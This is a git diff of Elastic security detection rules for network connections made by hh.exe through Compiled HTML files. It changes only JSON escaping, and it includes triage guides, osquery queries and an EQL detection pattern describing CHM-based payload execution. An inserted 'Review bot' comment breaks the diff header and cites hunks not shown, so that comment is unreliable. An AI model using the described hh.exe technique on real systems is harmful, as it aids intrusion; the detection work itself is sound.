diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json index 7b3165471b9..2298ac1adcd 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json index 768f9f7ff2b..4c3cdee6855 100644 --- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json index 71cf18e26b0..ff35361c35e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious 
artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious 
artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json
index 8469a808bd9..80ff93aa289 100644
--- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json
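Review bot: Every change in this `note` hunk is a JSON escape-style change only — `\u003e` becomes a literal `>` — so the parsed rule is byte-identical after loading, and the same holds for the `setup` hunk at `@@ -63,7` above (`\u003c` → `<`), for the `@@ -13,7` hunk of `_104` ending at L4286, and for all the `framework` hunks (`\u0026` → `&`). On the new side the very same string still keeps `\u2014` escaped while `>` is now literal, which suggests the escaping reflects whichever serializer last wrote the file rather than a fixed convention; if that serializer is not pinned in the release tooling, these fields will keep flipping between releases and bury genuine query or threat-mapping changes in the diff. I would expect the release script to normalize escaping once so a rule file only changes when its content does, and a parse-level comparison such as `jq -S .` on both sides would confirm this hunk is content-neutral before merging. The enclosing JSON object starts and ends outside the hunk.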
+++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious 
artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious 
artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json
index c0c7de418d6..e83b460830c 100644
--- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious 
artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
